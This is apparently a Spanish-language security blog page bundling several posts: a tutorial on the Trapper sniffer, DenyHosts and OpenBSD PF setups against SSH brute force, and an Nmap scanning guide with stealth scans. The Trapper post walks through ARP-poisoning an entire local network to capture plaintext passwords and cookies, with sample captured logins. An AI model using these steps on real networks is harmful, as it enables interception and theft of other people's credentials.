Tutorial de Trapper

Trapper 0.3.3
Bueno estos chicos trabajan rapido Y acaban de sacar otra version de trapper
Cosas nuevas:
– Dirección MAC falsa (00:11:22:33:44:55 o aleatoria)
– Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain; además también se puede especificar los puertos que se deseen sniffear)
– IRC chat sniffing
Bugs arreglados:
– Detección de la dirección IP local
– Información duplicada en el HTTP sniffing
– Install.pl, algunos módulos faltantes
Lo pueden descargar de aquí.
http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz</a></div>

Bueno les habia prometido un tutorial de uso de esta herramienta.
y Aqui vamos
tar -zxvf trapper-0.3.3.tar.gz
cd trapper-0.3.3/
Instala manualmente Net::Pcap de search.cpan.org y luego
perl install.pl
Esperamos a que se instalen los Modulos de perl
Ahora
#perl trapper.pl
–trapper ver. 0.3.3–
–Sniffer and ARP Poisoning Routing program–
Usage: trapper -i <interface> -m <mode> [-v msn,cookiem,irc] [-f fake_mac || random ]
Mode: sniff | apr
Example: trapper -i eth0 -m apr -f 00:02:5C:17:2B:FA
Si notan existen 2 modos el modo sniff y apr
Para poder sniffear toda la red tendremos que lanzar un ataque apr(arp).
de la siguiente forma.
Deberia llevar -f y la fakemac pero en algunas distros causa un problema asi que por ahora
no la pondremos.
#perl trapper.pl -i eth1 -m apr
——————————————————————-</div>

trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECTED: ARP POISON ROUTING
[*] Specify the range to scan (ex. 192.168.1.0192.168.1.254 )
Aqui especificaremos el rango de ips que queremos sniffear Podria ser toda la red local.
[*] Scanning range from 192.168.1.0 to 192.168.1.254…
[*] Skipping our host (IP attacker): 192.168.1.118
IP: 192.168.1.1 MAC: 00:0f:66:da:ab:89
IP: 192.168.1.100 MAC: 00:14:51:82:de:97
[*] Hosts found: 2
[*] Select Option:
[*] 1) One-to-One: Hijack the traffic only between two particular hosts
[*] 2) One-to-All: Hijack the network faking a single host (The default gateway is a good option)
[*] 3) Hijack the entire network
Ahora que tipo de ataque realizaremos , el mas bonito es el 3 . para que esniffe todo el tradico
de las maquinas que se encuentran dentro de la red local.
Type of attack: 3
[*] Infecting Host(s)…
[*] Leaving arp-poison into background: pid 6340 …
[*] Sniffing using Dev :eth1:
..Bueno y Ahora que ?
Si hay trafico empezaran a salir contraseñas en texto plano
Por default snifea los protocolos
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
Que es lo mismo que seleccionaramos esta opcion
##perl trapper.pl -i eth1 -m sniff
——————————————————————-</div>

trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECT: SNIFFER
[*] Supported protocols:
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
10. All
Pues de una vez todo no? mas vale que sobre y no que falte.
Select option(s) [default: 10]: 10
[*] Sniffing using Dev :eth1:
[*] Filter :tcp and port 21 or port 23 or port 25 or port 80 or port 143 or port 110 or port 1863 or port 6667 or port 445:
MSG: VERSION
User: test
Pass: test
Host: hi5.com
User/Pass: [email protected]&password=test&remember=on
Host: hi5.com
User/Pass: status=1:1:1&fromInterstitial=true&circle=17851952&status-0=1&userid=144997706&circle=17851952&status-1=1&userid=6619911&circle=17851952&status-2=1&userid=9180542</div>

Bueno que les parece?
para el irc crea un directorio donde guarda las conversaciones tanto privadas como de algun canal.
para el msn igual crea un directorio por cada conversacion que se tienen el messenger.
para pop3/ftp crea un arhicvo llamado ftp-pop3.txt
Dudas, Comentarios?
Happy Hacking Guys

</span>

DenyHosts

Bueno en un Articulo pasado,escribi un post sobre como prevenir Brute Force usando PF y un script que encontre ahi por la red.
Este script solo jalara en FreeBSD,NetBSD,OpenBSD, Siempre y Cuando este activado PF(Packet Filter),Bueno ahora le toca el turno a Linux,Sin importar la distribución de linux estemos usando.

Como parar estos ataques que por muy simple que parezca , tienen una efectividad buena,ya que algunos usuarios nuevos en Linux , Asignan contraseñas muy faciles ejemplo root:123456 , rc:125790 (“cualquier parecido con la realidad es mera coincidencia , Ja ja ”), y por lo general
ponen contraseñas que por default vienen en algún diccionario de los muchos que existen para realizar este tipo de ataques.

La herramienta se llama DenyHosts http://denyhosts.sourceforge.net/</a></div>

Bueno ya saben la misma historia de siempre, Primero verifiquen si encuentran el paquete para la distribucion de Linux que usan:
En este caso es una maquina en Debian.
# apt-cache search denyhost
denyhosts – an utility to help sys admins thwart ssh hackers
#apt-get install denyhosts
Ya que se termine de instalar
Editamos el fichero /etc/denyhosts.conf
El archivo de configuracion es Muy facil de editar. Aqui solo pondre las lineas que tienen que ir ya ustedes lo configuran mas a fondo pero con estas configuracion basiica funcionara.
#####
SECURE_LOG = /var/log/auth.log
HOSTS_DENY = /etc/hosts.deny
PURGE_DENY = 12h
BLOCK_SERVICE = ALL
DENY_THRESHOLD_INVALID = 2
DENY_THRESHOLD_VALID = 10
DENY_THRESHOLD_ROOT = 2
DENY_THRESHOLD_RESTRICTED = 1
WORK_DIR = /var/lib/denyhosts
SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES</div>

HOSTNAME_LOOKUP=YES
LOCK_FILE = /var/run/denyhosts.pid
ADMIN_EMAIL = cliente_at_servidor_dot_com
SMTP_HOST = localhost
SMTP_PORT = 25
SMTP_FROM = DenyHosts
SMTP_SUBJECT = DenyHosts Reporte
SMTP_DATE_FORMAT = %a, %d %b %Y %H:%M:%S %z
AGE_RESET_VALID=5d
AGE_RESET_ROOT=25d
AGE_RESET_RESTRICTED=25d
AGE_RESET_INVALID=10d
DAEMON_LOG = /var/log/denyhosts
DAEMON_SLEEP = 30s
DAEMON_PURGE = 1h
Y guardamos los cambios
y prendemos el servicio de Denyhosts
/etc/init.d/denyhosts start
Si le damos un cat /etc/hosts.deny
# ALL: PARANOID
# DenyHosts: Mon Dec 3 10:26:46 2007 | ALL:
# DenyHosts: Mon Dec 3 10:41:17 2007 | ALL: 189.149.66.75
# DenyHosts: Mon Dec 3 10:42:06 2007 | ALL: 189.149.66.75
Adios Script Kiddos
Y bueno claro que tambien existe un Denyhosts para BSD
Para Freebsd
Ports en Freebsd
cd /usr/ports/security/denyhosts
make install clean
Para Netbsd
pkgsrc/security/py-denyhosts/
make install clean
Para Openbsd?
Existen Otras herramientas para prevenir estos tipicos ataques,Pero desde mi punto de vista es mas facil cambiar el puerto de nuestro ssh por default es 22 a cualquier otro puerto.
Y se evitarian de este tipos de ataques

</div>

</span>

OpenBSD SSH Protección

Bueno Existen Varias Maneras de Bloquear estos ataques, conocidos como ataques de fuerza bruta.

Si bruta, así como los brutos que los hacen que manera de perder el tiempo pero bueno. Las mas fáciles:

*Cambiar el puerto 22 por otro a nuestro servidor ssh.
*Si usamos linux existen infinidad de herramientas que nos pueden apoyar en esta tarea.
*Si usas BSD y tienes activado PF en tu sistema esta opción te servirá.
Crearemos un pequeño script en bash que contendra estas lineas:

Meteremos este script a un crond como root .

Siguiente paso es Editar nuestras reglas /etc/pf.conf (Ya tienen que saber como habilitar pf en su sistemas BSD)

#######

ext_if=“vr0”

table <kiddies> persist

block in on $ext_if from <kiddies>

######

Activamos nuestras reglas de Packet Filter (pf) doy por echo que ya saben hacer eso.

pfctl -t kiddies -vTshow

# pfctl -t kiddies -vTshow

61.95.144.100

Cleared: Mon Nov 19 00:40:01 2007

In/Block: [ Packets: 0 Bytes: 0 ]

In/Pass: [ Packets: 0 Bytes: 0 ]

Out/Block: [ Packets: 0 Bytes: 0 ]

Out/Pass: [ Packets: 0 Bytes: 0 ]

82.127.26.2

Cleared: Thu Nov 22 22:35:02 2007

In/Block: [ Packets: 0 Bytes: 0 ]

In/Pass: [ Packets: 0 Bytes: 0 ]

Out/Block: [ Packets: 0 Bytes: 0 ]

Out/Pass: [ Packets: 0 Bytes: 0 ]

Bibliografia

Ssh Proteccion

Nmap la herramienta de análisis de host

Si muchas veces nos encontramos en la necesidad de analizar un determinado
host o una rango de host para saber que servicios nos está proporcionando Nmap es la solución.
He redactado este pequeño tutorial del manejo de esta poderosa herramienta de auditoría de redes.
La sintaxis de Nmap es la siguientes:

$nmap [tipo scan] [opciones] [objetivo] [especificaciones]

Bueno ya sabemos cual es la sintaxis básica de Nmap, manos a la obra.

$ nmap 192.168.0.4

Starting Nmap 4.20 ( http://insecure.org ) at 2008-01-09 18:42 CST
Interesting ports on 192.168.0.4:
Not shown: 1693 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs

Nmap finished: 1 IP address (1 host up) scanned in 0.481 seconds

Esto nos dice que puerto tenemos, si está abierto o no y también nos dice el tipo de servicio que está en dicho puerto.
Nuestro resultado puede variar dependiendo nuestro tipo de Scan que realizemos.
Por ejemplo conozcamos el Sistema Operativo en dicho host.

$ nmap -O 192.168.0.4

Starting Nmap 4.20 ( http://insecure.org ) at 2008-01-09 18:55 CST
Interesting ports on 192.168.0.4:
Not shown: 1693 closed ports
PORT STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=1/9%OT=111%CT=1%CU=39464%PV=Y%DS=0%G=Y%TM=47856CFD%P=i686-
OS:pc-linux-gnu)SEQ(SP=D1%GCD=1%ISR=EF%TI=Z%II=I%TS=8)OPS(O1=M400CST11NW6%O
OS:2=M400CST11NW6%O3=M400CNNT11NW6%O4=M400CST11NW6%O5=M400CST11NW6%O6=M400C
OS:ST11)WIN(W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF=Y%T=
OS:40%W=8018%O=M400CNNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=Y%DF=Y%T=40%W=8000%S=O%A=S+%F=AS%O=M400CST11NW6%RD=0%Q=)T4(R=
OS:Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=A
2OS:R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=4
OS:0%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%TOS=C0%IPL=164%UN=0%RIPL
OS:=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=N%T=40%TOSI=S%CD=S%SI=S%D
OS:LI=S)


Uptime: 0.223 days (since Wed Jan 9 13:34:35 2008)
Network Distance: 0 hops

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 11.525 seconds

Aqui nos damos cuenta que tenemos un Sistema Operativo Linux y una huella TCP/IP que tiene cada Sistema Operativo en particular.
Esto se debe a que Nmap no detecto exactamente que Sistema Operativo esta corriendo dicho host.
Pero analizemos un host en Windows:

$ nmap -O 192.168.0.3

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.2):
(The 1544 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open listen
5000/tcp open fics

Remote OS guesses: Windows Me or Windows 2000 RC1 through final
release, Windows Millenium Edition v4.90.3000

Nmap run completed — 1 IP address (1 host up) scanned in 3 seconds

Ahora ya sabemos que OS tiene nuestro host, veamos que tenemos en nuestra red.

$nmap -sP 192.168.0.1-255

Starting Nmap 4.20 ( http://insecure.org ) at 2008-01-09 19:27 CST
Host 192.168.0.1 appears to be up.
MAC Address: 00:1C:11:AE:66:EB (Unknown)
Host 192.168.0.2 appears to be up.
MAC Address: 00:17:FA:B4:6D:6B (Microsoft)
Host 192.168.0.4 appears to be up.
Nmap finished: 255 IP addresses (3 hosts up) scanned in 5.873 seconds

Lo anterior nos enseña que host tenemos en nuestro rango 1-255, esto realizó un ping scan
Ahora veamos un análisis mas chingon.

sN: Stealth, Null Scan, este tipo de scan pone en off todos los flags.

sF: Stealth FIN Scan, este tipo de scan usa paquetes con el flag FIN activado

para las pruebas.

sX: Stealth Xmas Tree Scan, este tipo de scan envía paquetes con los

flag FIN, URG, y PUSH activados.

sp: Ping Scan, realiza un scan dentro de un rango especifico de hosts. Útil

para conocer que hosts se encuentran en linea sin ser detectados.

Si deseamos hacer un stealth scan del tipo Xmas Tree, y además queremos saber el Sistema Operativo del destino

$nmap -sX -O 192.168.0.4

Starting Nmap 4.20 ( http://insecure.org ) at 2008-01-09 19:44 CST
Warning: OS detection for 192.168.0.4 will be MUCH less reliable because we did not find at least
1 open and 1 closed TCP port
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
Interesting ports on 192.168.0.4:
Not shown: 1693 closed ports
PORT STATE SERVICE
111/tcp open|filtered rpcbind
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
2049/tcp open|filtered nfs
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.939 seconds

Ahora veamos una chida nmapeada.

$nmap -p 25,22,23 -sX -P0 192.168.0.4

Starting Nmap 4.20 ( http://insecure.org ) at 2008-01-09 20:10 CST
Interesting ports on 192.168.0.4:
PORT STATE SERVICE
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp

Nmap finished: 1 IP address (1 host up) scanned in 0.071 seconds

Con esto hicimos Stealth Xmas Tree scan analizamos los puertos 25,22,23, que no genere ping al host.

$nmap -sX -O 192.168.0.4 -oX scan_nmap.xml

Lo anterior nos da el mismo resultado que el anterior pero con una diferencia de que este nos genera un xml de log.
Bueno creo que es todo por el momento, cabe aclarar que el tutorial no incluye todas las opciones de nmap, para más
información no duden en consultar su

$man nmap

Espero poder haberles dado el gusanito de usar Nmap en sus auditorías.

Securing And Hardening Linux

Securing && Hardening
Traducido Literalmente Asegurando y Endureciendo.
En este Caso Linux/Unix
En Terminos computacionales segun la Wikipedia.

“In computing, hardening is usually the process of securing a system. This work is especially done to protect systems against attackers. This would typically include removal of unnecessary usernames or logins and the disabling or removal of unnecessary services.

There are various methods of hardening Unix and Linux systems. This may involve, among other measures, applying a patch to thekernel such as Exec Shield or PaX; closing open network ports; and setting up intrusion-detection systems, firewalls and intrusion-prevention systems. There are also hardening scripts and tools like Bastille Linux and Apache/PHP Hardener [1] that can, for example, deactivate unneeded features in configuration files or perform various other protective measures.”



Bueno despues de tanto choro mareador.
Les dejo aqui un Articulo Muy Bueno sobre

Happy Hacking


Mas adelante trataremos de escribir ya articulos editados por nosotros mismos. Y no tener tan abandonado.